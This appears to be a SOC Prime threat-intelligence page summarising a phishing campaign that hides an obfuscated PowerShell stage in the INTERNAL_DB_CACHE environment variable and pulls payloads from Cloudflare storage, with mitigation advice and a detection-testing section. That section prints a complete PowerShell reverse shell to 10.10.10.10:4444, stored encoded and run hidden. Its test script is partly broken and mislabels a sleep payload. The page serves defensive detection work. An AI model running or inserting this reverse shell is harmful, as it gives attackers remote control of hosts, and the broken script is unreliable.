SOC Prime Bias: Medium

05 Jun 2026 15:49 UTC
newspaper icon SANS Internet Storm Center

The Evil MSI Background Returns

Author Photo
SOC Prime Team linkedin icon Follow
The Evil MSI Background Returns
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

A phishing email carrying a WeTransfer link delivers a JavaScript file that stores an obfuscated payload inside an environment variable. That payload is later decoded and executed through PowerShell launched via WMI, which downloads a malicious MSI-style background JPEG and a .NET DLL from Cloudflare Workers and R2 storage. The DLL is a modified build of Microsoft.Win32.TaskScheduler used to load follow-on payloads and possibly create persistence through scheduled tasks. The campaign highlights how threat actors continue to abuse legitimate cloud services to host and distribute malicious components.

Investigation

The analyst identified an initial JavaScript file named Remittance Advice.js containing ROT13-obfuscated code that creates the INTERNAL_DB_CACHE environment variable. PowerShell is then launched in a hidden window through WMI and runs the decoded script block. That script retrieves a JPEG file from a workers.dev subdomain and a PNG file from a public r2.dev bucket, both likely used to carry additional payloads through steganographic methods. The final-stage component is a .NET DLL derived from the open-source TaskScheduler library.

Mitigation

Organizations should block access to known malicious domains such as we.tl, workers.dev, and r2.dev at the firewall or proxy layer. PowerShell execution and WMI-based process creation should be restricted for untrusted users wherever possible. Defenders should also monitor for hidden PowerShell execution, abuse of the Win32_Process.Create method, and unusual environment variables such as INTERNAL_DB_CACHE. Files downloaded from public cloud storage should be subjected to strict validation and inspection.

Response

Security teams should alert when PowerShell is started with a hidden window through WMI and when the INTERNAL_DB_CACHE variable is created or modified. Any process that connects to the identified URLs or downloads content from workers.dev or r2.dev should be investigated immediately. Forensic analysis should focus on locating the malicious .NET DLL and identifying newly created scheduled tasks that rely on the TaskScheduler library. Affected hosts should be remediated promptly, and detection content should be updated with the observed indicators.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 classDef malware fill:#ff9999 classDef file fill:#ccccff %% Node definitions action_phishing["<b>Action</b> – <b>T1566.002 Phishing: Spearphishing Link</b><br/><b>Description</b>: Sends email with a malicious WeTransfer link to victims"] class action_phishing action tool_js["<b>Tool</b> – <b>JavaScript Payload</b><br/><b>Techniques</b>: T1027.008 Obfuscated Files or Information, T1132 Data Encoding<br/><b>Description</b>: Executes and sets an environment variable containing a ROT13/modified Base64 payload"] class tool_js tool process_wmi_ps["<b>Process</b> – <b>PowerShell via WMI</b><br/><b>Techniques</b>: T1216 Signed Binary Proxy Execution, T1036.009 Masquerading, T1564.010 Hide Artifacts<br/><b>Description</b>: Launches a hidden PowerShell process through WMI"] class process_wmi_ps process malware_taskdll["<b>Malware</b> – <b>.NET TaskScheduler DLL</b><br/><b>Technique</b>: T1127.003 Trusted Developer Utilities Proxy Execution<br/><b>Description</b>: Loads the decoded payload as a .NET DLL and registers it with the Task Scheduler"] class malware_taskdll malware tool_downloader["<b>Tool</b> – <b>Downloader</b><br/><b>Techniques</b>: T1578 Acquire Infrastructure, T1538 Data from Cloud Storage, T1537 Transfer Data to Cloud Account<br/><b>Description</b>: Retrieves additional files from Cloudflare Workers and R2 storage"] class tool_downloader tool file_png["<b>File</b> – <b>Steganographic PNG</b><br/><b>Description</b>: PNG image containing hidden data that is later processed"] class file_png file %% Connections showing attack flow action_phishing –>|delivers| tool_js tool_js –>|executes and sets| process_wmi_ps process_wmi_ps –>|launches| malware_taskdll malware_taskdll –>|loads| tool_downloader tool_downloader –>|fetches| file_png "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The attacker first injects a base64‑encoded PowerShell payload into a process‑level environment variable named INTERNAL_DB_CACHE. This payload, when decoded, launches a reverse shell. The attacker then invokes a second PowerShell process that reads the variable and executes it via ScriptBlock::Create, thereby keeping the malicious command out of the immediate command line. This “living‑off‑the‑land” approach avoids static signature detection and leverages the two‑step pattern the rule is designed to catch.

    1. Stage 1 – Encode payload and store in env var

      $payload = '$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
[Environment]::SetEnvironmentVariable("INTERNAL_DB_CACHE", $enc, "Process")

    2. Stage 2 – Execute the encoded payload from the env var

      powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command [ScriptBlock]::Create([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($env:INTERNAL_DB_CACHE)))

  • Regression Test Script: The script below automates the two steps, captures timestamps for correlation, and inserts a short pause to let the first process finish before the second starts.

    # ----------------------------------------------
# PowerShell simulation of env‑var encoded payload
# ----------------------------------------------

# Step 1 – Encode a harmless reverse‑shell payload (replace with your C2 address)
$payload = '$Sleep = 5; Start-Sleep -Seconds $Sleep'   # Small benign payload for safe testing
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
[Environment]::SetEnvironmentVariable("INTERNAL_DB_CACHE", $enc, "Process")
Write-Host "[*] Environment variable INTERNAL_DB_CACHE set."

# Short pause to ensure the first command is logged
Start-Sleep -Seconds 2

# Step 2 – Execute the payload from the variable
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command `
Write-Host "[*] Payload execution triggered."

  • Cleanup Commands: Remove the temporary environment variable and terminate any stray processes created during the test.

    # Remove the test environment variable
[Environment]::SetEnvironmentVariable("INTERNAL_DB_CACHE", $null, "Process")
Write-Host "[*] CLEANUP – INTERNAL_DB_CACHE removed."

# Ensure no orphaned powershell.exe instances remain (exclude the current session)
Get-Process -Name "powershell" | Where-Object {$_.Id -ne $PID} | Stop-Process -Force
Write-Host "[*] CLEANUP – orphaned PowerShell processes terminated."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free